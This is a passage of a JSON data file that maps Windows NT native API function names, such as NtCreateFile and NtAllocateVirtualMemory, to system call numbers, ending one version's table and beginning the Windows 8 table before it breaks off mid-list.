\"NtFsControlFile\": \"56\", \"NtWriteVirtualMemory\": \"57\", \"NtCloseObjectAuditAlarm\": \"58\", \"NtDuplicateObject\": \"59\", \"NtQueryAttributesFile\": \"60\", \"NtClearEvent\": \"61\", \"NtReadVirtualMemory\": \"62\", \"NtOpenEvent\": \"63\", \"NtAdjustPrivilegesToken\": \"64\", \"NtDuplicateToken\": \"65\", \"NtContinue\": \"66\", \"NtQueryDefaultUILanguage\": \"67\", \"NtQueueApcThread\": \"68\", \"NtYieldExecution\": \"69\", \"NtAddAtom\": \"70\", \"NtCreateEvent\": \"71\", \"NtQueryVolumeInformationFile\": \"72\", \"NtCreateSection\": \"73\", \"NtFlushBuffersFile\": \"74\", \"NtApphelpCacheControl\": \"75\", \"NtCreateProcessEx\": \"76\", \"NtCreateThread\": \"77\", \"NtIsProcessInJob\": \"78\", \"NtProtectVirtualMemory\": \"79\", \"NtQuerySection\": \"80\", \"NtResumeThread\": \"81\", \"NtTerminateThread\": \"82\", \"NtReadRequestData\": \"83\", \"NtCreateFile\": \"84\", \"NtQueryEvent\": \"85\", \"NtWriteRequestData\": \"86\", \"NtOpenDirectoryObject\": \"87\", \"NtAccessCheckByTypeAndAuditAlarm\": \"88\", \"NtQuerySystemTime\": \"89\", \"NtWaitForMultipleObjects\": \"90\", \"NtSetInformationObject\": \"91\", \"NtCancelIoFile\": \"92\", \"NtTraceEvent\": \"93\", \"NtPowerInformation\": \"94\", \"NtSetValueKey\": \"95\", \"NtCancelTimer\": \"96\", \"NtSetTimer\": \"97\", \"NtAccessCheck\": \"98\", \"NtAccessCheckByType\": \"99\", \"NtAccessCheckByTypeResultList\": \"100\", \"NtAccessCheckByTypeResultListAndAuditAlarm\": \"101\", \"NtAccessCheckByTypeResultListAndAuditAlarmByHandle\": \"102\", \"NtAddAtomEx\": \"103\", \"NtAddBootEntry\": \"104\", \"NtAddDriverEntry\": \"105\", \"NtAdjustGroupsToken\": \"106\", \"NtAdjustTokenClaimsAndDeviceGroups\": \"107\", \"NtAlertResumeThread\": \"108\", \"NtAlertThread\": \"109\", \"NtAlertThreadByThreadId\": \"110\", \"NtAllocateLocallyUniqueId\": \"111\", \"NtAllocateReserveObject\": \"112\", \"NtAllocateUserPhysicalPages\": \"113\", \"NtAllocateUuids\": \"114\", \"NtAlpcAcceptConnectPort\": \"115\", \"NtAlpcCancelMessage\": \"116\", \"NtAlpcConnectPort\": \"117\", \"NtAlpcConnectPortEx\": \"118\", \"NtAlpcCreatePort\": \"119\", \"NtAlpcCreatePortSection\": \"120\", \"NtAlpcCreateResourceReserve\": \"121\", \"NtAlpcCreateSectionView\": \"122\", \"NtAlpcCreateSecurityContext\": \"123\", \"NtAlpcDeletePortSection\": \"124\", \"NtAlpcDeleteResourceReserve\": \"125\", \"NtAlpcDeleteSectionView\": \"126\", \"NtAlpcDeleteSecurityContext\": \"127\", \"NtAlpcDisconnectPort\": \"128\", \"NtAlpcImpersonateClientOfPort\": \"129\", \"NtAlpcOpenSenderProcess\": \"130\", \"NtAlpcOpenSenderThread\": \"131\", \"NtAlpcQueryInformation\": \"132\", \"NtAlpcQueryInformationMessage\": \"133\", \"NtAlpcRevokeSecurityContext\": \"134\", \"NtAlpcSendWaitReceivePort\": \"135\", \"NtAlpcSetInformation\": \"136\", \"NtAreMappedFilesTheSame\": \"137\", \"NtAssignProcessToJobObject\": \"138\", \"NtAssociateWaitCompletionPacket\": \"139\", \"NtCancelIoFileEx\": \"140\", \"NtCancelSynchronousIoFile\": \"141\", \"NtCancelTimer2\": \"142\", \"NtCancelWaitCompletionPacket\": \"143\", \"NtCommitComplete\": \"144\", \"NtCommitEnlistment\": \"145\", \"NtCommitTransaction\": \"146\", \"NtCompactKeys\": \"147\", \"NtCompareTokens\": \"148\", \"NtCompleteConnectPort\": \"149\", \"NtCompressKey\": \"150\", \"NtConnectPort\": \"151\", \"NtCreateDebugObject\": \"152\", \"NtCreateDirectoryObject\": \"153\", \"NtCreateDirectoryObjectEx\": \"154\", \"NtCreateEnlistment\": \"155\", \"NtCreateEventPair\": \"156\", \"NtCreateIRTimer\": \"157\", \"NtCreateIoCompletion\": \"158\", \"NtCreateJobObject\": \"159\", \"NtCreateJobSet\": \"160\", \"NtCreateKeyTransacted\": \"161\", \"NtCreateKeyedEvent\": \"162\", \"NtCreateLowBoxToken\": \"163\", \"NtCreateMailslotFile\": \"164\", \"NtCreateMutant\": \"165\", \"NtCreateNamedPipeFile\": \"166\", \"NtCreatePagingFile\": \"167\", \"NtCreatePort\": \"168\", \"NtCreatePrivateNamespace\": \"169\", \"NtCreateProcess\": \"170\", \"NtCreateProfile\": \"171\", \"NtCreateProfileEx\": \"172\", \"NtCreateResourceManager\": \"173\", \"NtCreateSemaphore\": \"174\", \"NtCreateSymbolicLinkObject\": \"175\", \"NtCreateThreadEx\": \"176\", \"NtCreateTimer\": \"177\", \"NtCreateTimer2\": \"178\", \"NtCreateToken\": \"179\", \"NtCreateTokenEx\": \"180\", \"NtCreateTransaction\": \"181\", \"NtCreateTransactionManager\": \"182\", \"NtCreateUserProcess\": \"183\", \"NtCreateWaitCompletionPacket\": \"184\", \"NtCreateWaitablePort\": \"185\", \"NtCreateWnfStateName\": \"186\", \"NtCreateWorkerFactory\": \"187\", \"NtDebugActiveProcess\": \"188\", \"NtDebugContinue\": \"189\", \"NtDeleteAtom\": \"190\", \"NtDeleteBootEntry\": \"191\", \"NtDeleteDriverEntry\": \"192\", \"NtDeleteFile\": \"193\", \"NtDeleteKey\": \"194\", \"NtDeleteObjectAuditAlarm\": \"195\", \"NtDeletePrivateNamespace\": \"196\", \"NtDeleteValueKey\": \"197\", \"NtDeleteWnfStateData\": \"198\", \"NtDeleteWnfStateName\": \"199\", \"NtDisableLastKnownGood\": \"200\", \"NtDisplayString\": \"201\", \"NtDrawText\": \"202\", \"NtEnableLastKnownGood\": \"203\", \"NtEnumerateBootEntries\": \"204\", \"NtEnumerateDriverEntries\": \"205\", \"NtEnumerateSystemEnvironmentValuesEx\": \"206\", \"NtEnumerateTransactionObject\": \"207\", \"NtExtendSection\": \"208\", \"NtFilterBootOption\": \"209\", \"NtFilterToken\": \"210\", \"NtFilterTokenEx\": \"211\", \"NtFlushBuffersFileEx\": \"212\", \"NtFlushInstallUILanguage\": \"213\", \"NtFlushInstructionCache\": \"214\", \"NtFlushKey\": \"215\", \"NtFlushProcessWriteBuffers\": \"216\", \"NtFlushVirtualMemory\": \"217\", \"NtFlushWriteBuffer\": \"218\", \"NtFreeUserPhysicalPages\": \"219\", \"NtFreezeRegistry\": \"220\", \"NtFreezeTransactions\": \"221\", \"NtGetCachedSigningLevel\": \"222\", \"NtGetCompleteWnfStateSubscription\": \"223\", \"NtGetContextThread\": \"224\", \"NtGetCurrentProcessorNumber\": \"225\", \"NtGetDevicePowerState\": \"226\", \"NtGetMUIRegistryInfo\": \"227\", \"NtGetNextProcess\": \"228\", \"NtGetNextThread\": \"229\", \"NtGetNlsSectionPtr\": \"230\", \"NtGetNotificationResourceManager\": \"231\", \"NtGetWriteWatch\": \"232\", \"NtImpersonateAnonymousToken\": \"233\", \"NtImpersonateThread\": \"234\", \"NtInitializeNlsFiles\": \"235\", \"NtInitializeRegistry\": \"236\", \"NtInitiatePowerAction\": \"237\", \"NtIsSystemResumeAutomatic\": \"238\", \"NtIsUILanguageComitted\": \"239\", \"NtListenPort\": \"240\", \"NtLoadDriver\": \"241\", \"NtLoadKey\": \"242\", \"NtLoadKey2\": \"243\", \"NtLoadKeyEx\": \"244\", \"NtLockFile\": \"245\", \"NtLockProductActivationKeys\": \"246\", \"NtLockRegistryKey\": \"247\", \"NtLockVirtualMemory\": \"248\", \"NtMakePermanentObject\": \"249\", \"NtMakeTemporaryObject\": \"250\", \"NtMapCMFModule\": \"251\", \"NtMapUserPhysicalPages\": \"252\", \"NtModifyBootEntry\": \"253\", \"NtModifyDriverEntry\": \"254\", \"NtNotifyChangeDirectoryFile\": \"255\", \"NtNotifyChangeKey\": \"256\", \"NtNotifyChangeMultipleKeys\": \"257\", \"NtNotifyChangeSession\": \"258\", \"NtOpenEnlistment\": \"259\", \"NtOpenEventPair\": \"260\", \"NtOpenIoCompletion\": \"261\", \"NtOpenJobObject\": \"262\", \"NtOpenKeyEx\": \"263\", \"NtOpenKeyTransacted\": \"264\", \"NtOpenKeyTransactedEx\": \"265\", \"NtOpenKeyedEvent\": \"266\", \"NtOpenMutant\": \"267\", \"NtOpenObjectAuditAlarm\": \"268\", \"NtOpenPrivateNamespace\": \"269\", \"NtOpenProcessToken\": \"270\", \"NtOpenResourceManager\": \"271\", \"NtOpenSemaphore\": \"272\", \"NtOpenSession\": \"273\", \"NtOpenSymbolicLinkObject\": \"274\", \"NtOpenThread\": \"275\", \"NtOpenTimer\": \"276\", \"NtOpenTransaction\": \"277\", \"NtOpenTransactionManager\": \"278\", \"NtPlugPlayControl\": \"279\", \"NtPrePrepareComplete\": \"280\", \"NtPrePrepareEnlistment\": \"281\", \"NtPrepareComplete\": \"282\", \"NtPrepareEnlistment\": \"283\", \"NtPrivilegeCheck\": \"284\", \"NtPrivilegeObjectAuditAlarm\": \"285\", \"NtPrivilegedServiceAuditAlarm\": \"286\", \"NtPropagationComplete\": \"287\", \"NtPropagationFailed\": \"288\", \"NtPulseEvent\": \"289\", \"NtQueryBootEntryOrder\": \"290\", \"NtQueryBootOptions\": \"291\", \"NtQueryDebugFilterState\": \"292\", \"NtQueryDirectoryObject\": \"293\", \"NtQueryDriverEntryOrder\": \"294\", \"NtQueryEaFile\": \"295\", \"NtQueryFullAttributesFile\": \"296\", \"NtQueryInformationAtom\": \"297\", \"NtQueryInformationEnlistment\": \"298\", \"NtQueryInformationJobObject\": \"299\", \"NtQueryInformationPort\": \"300\", \"NtQueryInformationResourceManager\": \"301\", \"NtQueryInformationTransaction\": \"302\", \"NtQueryInformationTransactionManager\": \"303\", \"NtQueryInformationWorkerFactory\": \"304\", \"NtQueryInstallUILanguage\": \"305\", \"NtQueryIntervalProfile\": \"306\", \"NtQueryIoCompletion\": \"307\", \"NtQueryLicenseValue\": \"308\", \"NtQueryMultipleValueKey\": \"309\", \"NtQueryMutant\": \"310\", \"NtQueryOpenSubKeys\": \"311\", \"NtQueryOpenSubKeysEx\": \"312\", \"NtQueryPortInformationProcess\": \"313\", \"NtQueryQuotaInformationFile\": \"314\", \"NtQuerySecurityAttributesToken\": \"315\", \"NtQuerySecurityObject\": \"316\", \"NtQuerySemaphore\": \"317\", \"NtQuerySymbolicLinkObject\": \"318\", \"NtQuerySystemEnvironmentValue\": \"319\", \"NtQuerySystemEnvironmentValueEx\": \"320\", \"NtQuerySystemInformationEx\": \"321\", \"NtQueryTimerResolution\": \"322\", \"NtQueryWnfStateData\": \"323\", \"NtQueryWnfStateNameInformation\": \"324\", \"NtQueueApcThreadEx\": \"325\", \"NtRaiseException\": \"326\", \"NtRaiseHardError\": \"327\", \"NtReadOnlyEnlistment\": \"328\", \"NtRecoverEnlistment\": \"329\", \"NtRecoverResourceManager\": \"330\", \"NtRecoverTransactionManager\": \"331\", \"NtRegisterProtocolAddressInformation\": \"332\", \"NtRegisterThreadTerminatePort\": \"333\", \"NtReleaseKeyedEvent\": \"334\", \"NtReleaseWorkerFactoryWorker\": \"335\", \"NtRemoveIoCompletionEx\": \"336\", \"NtRemoveProcessDebug\": \"337\", \"NtRenameKey\": \"338\", \"NtRenameTransactionManager\": \"339\", \"NtReplaceKey\": \"340\", \"NtReplacePartitionUnit\": \"341\", \"NtReplyWaitReplyPort\": \"342\", \"NtRequestPort\": \"343\", \"NtResetEvent\": \"344\", \"NtResetWriteWatch\": \"345\", \"NtRestoreKey\": \"346\", \"NtResumeProcess\": \"347\", \"NtRollbackComplete\": \"348\", \"NtRollbackEnlistment\": \"349\", \"NtRollbackTransaction\": \"350\", \"NtRollforwardTransactionManager\": \"351\", \"NtSaveKey\": \"352\", \"NtSaveKeyEx\": \"353\", \"NtSaveMergedKeys\": \"354\", \"NtSecureConnectPort\": \"355\", \"NtSerializeBoot\": \"356\", \"NtSetBootEntryOrder\": \"357\", \"NtSetBootOptions\": \"358\", \"NtSetCachedSigningLevel\": \"359\", \"NtSetContextThread\": \"360\", \"NtSetDebugFilterState\": \"361\", \"NtSetDefaultHardErrorPort\": \"362\", \"NtSetDefaultLocale\": \"363\", \"NtSetDefaultUILanguage\": \"364\", \"NtSetDriverEntryOrder\": \"365\", \"NtSetEaFile\": \"366\", \"NtSetHighEventPair\": \"367\", \"NtSetHighWaitLowEventPair\": \"368\", \"NtSetIRTimer\": \"369\", \"NtSetInformationDebugObject\": \"370\", \"NtSetInformationEnlistment\": \"371\", \"NtSetInformationJobObject\": \"372\", \"NtSetInformationKey\": \"373\", \"NtSetInformationResourceManager\": \"374\", \"NtSetInformationToken\": \"375\", \"NtSetInformationTransaction\": \"376\", \"NtSetInformationTransactionManager\": \"377\", \"NtSetInformationVirtualMemory\": \"378\", \"NtSetInformationWorkerFactory\": \"379\", \"NtSetIntervalProfile\": \"380\", \"NtSetIoCompletion\": \"381\", \"NtSetIoCompletionEx\": \"382\", \"NtSetLdtEntries\": \"383\", \"NtSetLowEventPair\": \"384\", \"NtSetLowWaitHighEventPair\": \"385\", \"NtSetQuotaInformationFile\": \"386\", \"NtSetSecurityObject\": \"387\", \"NtSetSystemEnvironmentValue\": \"388\", \"NtSetSystemEnvironmentValueEx\": \"389\", \"NtSetSystemInformation\": \"390\", \"NtSetSystemPowerState\": \"391\", \"NtSetSystemTime\": \"392\", \"NtSetThreadExecutionState\": \"393\", \"NtSetTimer2\": \"394\", \"NtSetTimerEx\": \"395\", \"NtSetTimerResolution\": \"396\", \"NtSetUuidSeed\": \"397\", \"NtSetVolumeInformationFile\": \"398\", \"NtSetWnfProcessNotificationEvent\": \"399\", \"NtShutdownSystem\": \"400\", \"NtShutdownWorkerFactory\": \"401\", \"NtSignalAndWaitForSingleObject\": \"402\", \"NtSinglePhaseReject\": \"403\", \"NtStartProfile\": \"404\", \"NtStopProfile\": \"405\", \"NtSubscribeWnfStateChange\": \"406\", \"NtSuspendProcess\": \"407\", \"NtSuspendThread\": \"408\", \"NtSystemDebugControl\": \"409\", \"NtTerminateJobObject\": \"410\", \"NtTestAlert\": \"411\", \"NtThawRegistry\": \"412\", \"NtThawTransactions\": \"413\", \"NtTraceControl\": \"414\", \"NtTranslateFilePath\": \"415\", \"NtUmsThreadYield\": \"416\", \"NtUnloadDriver\": \"417\", \"NtUnloadKey\": \"418\", \"NtUnloadKey2\": \"419\", \"NtUnloadKeyEx\": \"420\", \"NtUnlockFile\": \"421\", \"NtUnlockVirtualMemory\": \"422\", \"NtUnmapViewOfSectionEx\": \"423\", \"NtUnsubscribeWnfStateChange\": \"424\", \"NtUpdateWnfStateData\": \"425\", \"NtVdmControl\": \"426\", \"NtWaitForAlertByThreadId\": \"427\", \"NtWaitForDebugEvent\": \"428\", \"NtWaitForKeyedEvent\": \"429\", \"NtWaitForWorkViaWorkerFactory\": \"430\", \"NtWaitHighEventPair\": \"431\", \"NtWaitLowEventPair\": \"432\"}}, \"Windows 8\": {\"8.0\": {\"NtWorkerFactoryWorkerReady\": \"0\", \"NtMapUserPhysicalPagesScatter\": \"1\", \"NtWaitForSingleObject\": \"2\", \"NtCallbackReturn\": \"3\", \"NtReadFile\": \"4\", \"NtDeviceIoControlFile\": \"5\", \"NtWriteFile\": \"6\", \"NtRemoveIoCompletion\": \"7\", \"NtReleaseSemaphore\": \"8\", \"NtReplyWaitReceivePort\": \"9\", \"NtReplyPort\": \"10\", \"NtSetInformationThread\": \"11\", \"NtSetEvent\": \"12\", \"NtClose\": \"13\", \"NtQueryObject\": \"14\", \"NtQueryInformationFile\": \"15\", \"NtOpenKey\": \"16\", \"NtEnumerateValueKey\": \"17\", \"NtFindAtom\": \"18\", \"NtQueryDefaultLocale\": \"19\", \"NtQueryKey\": \"20\", \"NtQueryValueKey\": \"21\", \"NtAllocateVirtualMemory\": \"22\", \"NtQueryInformationProcess\": \"23\", \"NtWaitForMultipleObjects32\": \"24\", \"NtWriteFileGather\": \"25\", \"NtSetInformationProcess\": \"26\", \"NtCreateKey\": \"27\", \"NtFreeVirtualMemory\": \"28\", \"NtImpersonateClientOfPort\": \"29\", \"NtReleaseMutant\": \"30\", \"NtQueryInformationToken\": \"31\", \"NtRequestWaitReplyPort\": \"32\", \"NtQueryVirtualMemory\": \"33\", \"NtOpenThreadToken\": \"34\", \"NtQueryInformationThread\": \"35\", \"NtOpenProcess\": \"36\", \"NtSetInformationFile\": \"37\", \"NtMapViewOfSection\": \"38\", \"NtAccessCheckAndAuditAlarm\": \"39\", \"NtUnmapViewOfSection\": \"40\", \"NtReplyWaitReceivePortEx\": \"41\", \"NtTerminateProcess\": \"42\", \"NtSetEventBoostPriority\": \"43\", \"NtReadFileScatter\": \"44\", \"NtOpenThreadTokenEx\": \"45\", \"NtOpenProcessTokenEx\": \"46\", \"NtQueryPerformanceCounter\": \"47\", \"NtEnumerateKey\": \"48\", \"NtOpenFile\": \"49\", \"NtDelayExecution\": \"50\", \"NtQueryDirectoryFile\": \"51\", \"NtQuerySystemInformation\": \"52\", \"NtOpenSection\": \"53\", \"NtQueryTimer\": \"54\", \"NtFsControlFile\": \"55\", \"NtWriteVirtualMemory\": \"56\", \"NtCloseObjectAuditAlarm\": \"57\", \"NtDuplicateObject\": \"58\", \"NtQueryAttributesFile\": \"59\", \"NtClearEvent\": \"60\", \"NtReadVirtualMemory\": \"61\", \"NtOpenEvent\": \"62\", \"NtAdjustPrivilegesToken\": \"63\", \"NtDuplicateToken\": \"64\", \"NtContinue\": \"65\", \"NtQueryDefaultUILanguage\": \"66\", \"NtQueueApcThread\": \"67\", \"NtYieldExecution\": \"68\", \"NtAddAtom\": \"69\", \"NtCreateEvent\": \"70\", \"NtQueryVolumeInformationFile\": \"71\", \"NtCreateSection\": \"72\", \"NtFlushBuffersFile\": \"73\", \"NtApphelpCacheControl\": \"74\", \"NtCreateProcessEx\": \"75\", \"NtCreateThread\": \"76\", \"NtIsProcessInJob\": \"77\", \"NtProtectVirtualMemory\": \"78\", \"NtQuerySection\": \"79\", \"NtResumeThread\": \"80\", \"NtTerminateThread\": \"81\", \"NtReadRequestData\": \"82\", \"NtCreateFile\": \"83\", \"NtQueryEvent\": \"84\", \"NtWriteRequestData\": \"85\", \"NtOpenDirectoryObject\": \"86\", \"NtAccessCheckByTypeAndAuditAlarm\": \"87\", \"NtQuerySystemTime\": \"88\", \"NtWaitForMultipleObjects\": \"89\", \"NtSetInformationObject\": \"90\", \"NtCancelIoFile\": \"91\", \"NtTraceEvent\": \"92\", \"NtPowerInformation\": \"93\", \"NtSetValueKey\": \"94\", \"NtCancelTimer\": \"95\", \"NtSetTimer\": \"96\", \"NtAcceptConnectPort\": \"97\", \"NtAccessCheck\": \"98\", \"NtAccessCheckByType\": \"99\", \"NtAccessCheckByTypeResultList\": \"100\", \"NtAccessCheckByTypeResultListAndAuditAlarm\": \"101\", \"NtAccessCheckByTypeResultListAndAuditAlarmByHandle\": \"102\", \"NtAddAtomEx\": \"103\", \"NtAddBootEntry\": \"104\", \"NtAddDriverEntry\": \"105\", \"NtAdjustGroupsToken\": \"106\", \"NtAdjustTokenClaimsAndDeviceGroups\": \"107\", \"NtAlertResumeThread\": \"108\", \"NtAlertThread\": \"109\", \"NtAlertThreadByThreadId\": \"110\", \"NtAllocateLocallyUniqueId\": \"111\", \"NtAllocateReserveObject\": \"112\", \"NtAllocateUserPhysicalPages\": \"113\", \"NtAllocateUuids\": \"114\", \"NtAlpcAcceptConnectPort\": \"115\", \"NtAlpcCancelMessage\": \"116\", \"NtAlpcConnectPort\": \"117\", \"NtAlpcConnectPortEx\": \"118\", \"NtAlpcCreatePort\": \"119\", \"NtAlpcCreatePortSection\": \"120\", \"NtAlpcCreateResourceReserve\": \"121\", \"NtAlpcCreateSectionView\": \"122\", \"NtAlpcCreateSecurityContext\": \"123\", \"NtAlpcDeletePortSection\": \"124\", \"NtAlpcDeleteResourceReserve\": \"125\", \"NtAlpcDeleteSectionView\": \"126\", \"NtAlpcDeleteSecurityContext\": \"127\", \"NtAlpcDisconnectPort\": \"128\", \"NtAlpcImpersonateClientOfPort\": \"129\", \"NtAlpcOpenSenderProcess\": \"130\", \"NtAlpcOpenSenderThread\": \"131\", \"NtAlpcQueryInformation\": \"132\", \"NtAlpcQueryInformationMessage\": \"133\", \"NtAlpcRevokeSecurityContext\": \"134\", \"NtAlpcSendWaitReceivePort\": \"135\", \"NtAlpcSetInformation\": \"136\", \"NtAreMappedFilesTheSame\": \"137\", \"NtAssignProcessToJobObject\": \"138\", \"NtAssociateWaitCompletionPacket\": \"139\", \"NtCancelIoFileEx\": \"140\", \"NtCancelSynchronousIoFile\": \"141\", \"NtCancelWaitCompletionPacket\": \"142\", \"NtCommitComplete\": \"143\", \"NtCommitEnlistment\": \"144\", \"NtCommitTransaction\": \"145\", \"NtCompactKeys\": \"146\", \"NtCompareTokens\": \"147\", \"NtCompleteConnectPort\": \"148\", \"NtCompressKey\": \"149\", \"NtConnectPort\": \"150\", \"NtCreateDebugObject\": \"151\", \"NtCreateDirectoryObject\": \"152\", \"NtCreateDirectoryObjectEx\": \"153\", \"NtCreateEnlistment\": \"154\", \"NtCreateEventPair\": \"155\", \"NtCreateIRTimer\": \"156\", \"NtCreateIoCompletion\": \"157\", \"NtCreateJobObject\": \"158\", \"NtCreateJobSet\": \"159\", \"NtCreateKeyTransacted\": \"160\", \"NtCreateKeyedEvent\": \"161\", \"NtCreateLowBoxToken\": \"162\", \"NtCreateMailslotFile\": \"163\", \"NtCreateMutant\": \"164\", \"NtCreateNamedPipeFile\": \"165\", \"NtCreatePagingFile\": \"166\", \"NtCreatePort\": \"167\", \"NtCreatePrivateNamespace\": \"168\", \"NtCreateProcess\": \"169\", \"NtCreateProfile\": \"170\", \"NtCreateProfileEx\": \"171\", \"NtCreateResourceManager\": \"172\", \"NtCreateSemaphore\": \"173\", \"NtCreateSymbolicLinkObject\": \"174\", \"NtCreateThreadEx\": \"175\", \"NtCreateTimer\": \"176\", \"NtCreateToken\": \"177\", \"NtCreateTokenEx\": \"178\", \"NtCreateTransaction\": \"179\", \"NtCreateTransactionManager\": \"180\", \"NtCreateUserProcess\": \"181\", \"NtCreateWaitCompletionPacket\": \"182\", \"NtCreateWaitablePort\": \"183\", \"NtCreateWnfStateName\": \"184\", \"NtCreateWorkerFactory\": \"185\", \"NtDebugActiveProcess\": \"186\", \"NtDebugContinue\": \"187\", \"NtDeleteAtom\": \"188\", \"NtDeleteBootEntry\": \"189\", \"NtDeleteDriverEntry\": \"190\", \"NtDeleteFile\": \"191\", \"NtDeleteKey\": \"192\", \"NtDeleteObjectAuditAlarm\": \"193\", \"NtDeletePrivateNamespace\": \"194\", \"NtDeleteValueKey\": \"195\", \"NtDeleteWnfStateData\": \"196\", \"NtDeleteWnfStateName\": \"197\", \"NtDisableLastKnownGood\": \"198\", \"NtDisplayString\": \"199\", \"NtDrawText\": \"200\", \"NtEnableLastKnownGood\": \"201\", \"NtEnumerateBootEntries\": \"202\", \"NtEnumerateDriverEntries\": \"203\", \"NtEnumerateSystemEnvironmentValuesEx\": \"204\", \"NtEnumerateTransactionObject\": \"205\", \"NtExtendSection\": \"206\", \"NtFilterBootOption\": \"207\", \"NtFilterToken\": \"208\", \"NtFilterTokenEx\": \"209\", \"NtFlushBuffersFileEx\": \"210\", \"NtFlushInstallUILanguage\": \"211\", \"NtFlushInstructionCache\": \"212\", \"NtFlushKey\": \"213\", \"NtFlushProcessWriteBuffers\": \"214\", \"NtFlushVirtualMemory\": \"215\", \"NtFlushWriteBuffer\": \"216\", \"NtFreeUserPhysicalPages\": \"217\", \"NtFreezeRegistry\": \"218\", \"NtFreezeTransactions\": \"219\", \"NtGetCachedSigningLevel\": \"220\", \"NtGetContextThread\": \"221\", \"NtGetCurrentProcessorNumber\": \"222\", \"NtGetDevicePowerState\": \"223\", \"NtGetMUIRegistryInfo\": \"224\", \"NtGetNextProcess\": \"225\", \"NtGetNextThread\": \"226\", \"NtGetNlsSectionPtr\": \"227\", \"NtGetNotificationResourceManager\": \"228\", \"NtGetWriteWatch\": \"229\", \"NtImpersonateAnonymousToken\": \"230\", \"NtImpersonateThread\": \"231\", \"NtInitializeNlsFiles\": \"232\", \"NtInitializeRegistry\": \"233\", \"NtInitiatePowerAction\": \"234\", \"NtIsSystemResumeAutomatic\": \"235\", \"NtIsUILanguageComitted\": \"236\", \"NtListenPort\": \"237\", \"NtLoadDriver\": \"238\", \"NtLoadKey\": \"239\", \"NtLoadKey2\": \"240\", \"NtLoadKeyEx\": \"241\", \"NtLockFile\": \"242\", \"NtLockProductActivationKeys\": \"243\", \"NtLockRegistryKey\": \"244\", \"NtLockVirtualMemory\": \"245\", \"NtMakePermanentObject\": \"246\", \"NtMakeTemporaryObject\": \"247\", \"NtMapCMFModule\": \"248\", \"NtMapUserPhysicalPages\": \"249\", \"NtModifyBootEntry\": \"250\", \"NtModifyDriverEntry\": \"251\", \"NtNotifyChangeDirectoryFile\": \"252\", \"NtNotifyChangeKey\": \"253\", \"NtNotifyChangeMultipleKeys\": \"254\", \"NtNotifyChangeSession\": \"255\", \"NtOpenEnlistment\": \"256\", \"NtOpenEventPair\": \"257\", \"NtOpenIoCompletion\": \"258\", \"NtOpenJobObject\": \"259\", \"NtOpenKeyEx\": \"260\", \"NtOpenKeyTransacted\": \"261\", \"NtOpenKeyTransactedEx\": \"262\", \"NtOpenKeyedEvent\": \"263\", \"NtOpenMutant\": \"264\", \"NtOpenObjectAuditAlarm\": \"265\", \"NtOpenPrivateNamespace\": \"266\", \"NtOpenProcessToken\": \"267\", \"NtOpenResourceManager\": \"268\", \"NtOpenSemaphore\": \"269\", \"NtOpenSession\": \"270\", \"NtOpenSymbolicLinkObject\": \"271\", \"NtOpenThread\": \"272\", \"NtOpenTimer\": \"273\", \"NtOpenTransaction\": \"274\", \"NtOpenTransactionManager\": \"275\", \"NtPlugPlayControl\": \"276\", \"NtPrePrepareComplete\": \"277\", \"NtPrePrepareEnlistment\": \"278\", \"NtPrepareComplete\": \"279\", \"NtPrepareEnlistment\": \"280\", \"NtPrivilegeCheck\": \"281\", \"NtPrivilegeObjectAuditAlarm\": \"282\", \"NtPrivilegedServiceAuditAlarm\": \"283\", \"NtPropagationComplete\": \"284\", \"NtPropagationFailed\": \"285\", \"NtPulseEvent\": \"286\", \"NtQueryBootEntryOrder\": \"287\", \"NtQueryBootOptions\": \"288\", \"NtQueryDebugFilterState\": \"289\", \"NtQueryDirectoryObject\": \"290\", \"NtQueryDriverEntryOrder\": \"291\", \"NtQueryEaFile\": \"292\", \"NtQueryFullAttributesFile\": \"293\", \"NtQueryInformationAtom\": \"294\", \"NtQueryInformationEnlistment\": \"295\", \"NtQueryInformationJobObject\": \"296\", \"NtQueryInformationPort\": \"297\", \"NtQueryInformationResourceManager\": \"298\", \"NtQueryInformationTransaction\": \"299\", \"NtQueryInformationTransactionManager\": \"300\", \"NtQueryInformationWorkerFactory\": \"301\", \"NtQueryInstallUILanguage\": \"302\", \"NtQueryIntervalProfile\": \"303\", \"NtQueryIoCompletion\": \"304\", \"NtQueryLicenseValue\": \"305\", \"NtQueryMultipleValueKey\": \"306\", \"NtQueryMutant\": \"307\", \"NtQueryOpenSubKeys\": \"308\", \"NtQueryOpenSubKeysEx\": \"309\", \"NtQueryPortInformationProcess\": \"310\", \"NtQueryQuotaInformationFile\": \"311\", \"NtQuerySecurityAttributesToken\": \"312\", \"NtQuerySecurityObject\": \"313\", \"NtQuerySemaphore\": \"314\", \"NtQuerySymbolicLinkObject\": \"315\", \"NtQuerySystemEnvironmentValue\": \"316\", \"NtQuerySystemEnvironmentValueEx\": \"317\", \"NtQuerySystemInformationEx\": \"318\", \"NtQueryTimerResolution\": \"319\", \"NtQueryWnfStateData\": \"320\", \"NtQueryWnfStateNameInformation\": \"321\", \"NtQueueApcThreadEx\": \"322\", \"NtRaiseException\": \"323\", \"NtRaiseHardError\": \"324\", \"NtReadOnlyEnlistment\": \"325\", \"NtRecoverEnlistment\": \"326\", \"NtRecoverResourceManager\": \"327\", \"NtRecoverTransactionManager\": \"328\", \"NtRegisterProtocolAddressInformation\": \"329\", \"NtRegisterThreadTerminatePort\": \"330\", \"NtReleaseKeyedEvent\": \"331\", \"NtReleaseWorkerFactoryWorker\": \"332\", \"NtRemoveIoCompletionEx\": \"333\", \"NtRemoveProcessDebug\": \"334\", \"NtRenameKey\": \"335\", \"NtRenameTransactionManager\": \"336\", \"NtReplaceKey\": \"337\", \"NtReplacePartitionUnit\": \"338\", \"NtReplyWaitReplyPort\": \"339\", \"NtRequestPort\": \"340\", \"NtResetEvent\": \"341\", \"NtResetWriteWatch\": \"342\", \"NtRestoreKey\": \"343\", \"NtResumeProcess\": \"344\", \"NtRollbackComplete\": \"345\", \"NtRollbackEnlistment\": \"346\", \"NtRollbackTransaction\": \"347\", \"NtRollforwardTransactionManager\": \"348\", \"NtSaveKey\": \"349\", \"NtSaveKeyEx\": \"350\", \"NtSaveMergedKeys\": \"351\", \"NtSecureConnectPort\": \"352\", \"NtSerializeBoot\": \"353\", \"NtSetBootEntryOrder\": \"354\", \"NtSetBootOptions\": \"355\", \"NtSetCachedSigningLevel\": \"356\", \"NtSetContextThread\": \"357\", \"NtSetDebugFilterState\": \"358\", \"NtSetDefaultHardErrorPort\": \"359\", \"NtSetDefaultLocale\": \"360\", \"NtSetDefaultUILanguage\": \"361\", \"NtSetDriverEntryOrder\": \"362\", \"NtSetEaFile\": \"363\", \"NtSetHighEventPair\": \"364\", \"NtSetHighWaitLowEventPair\": \"365\", 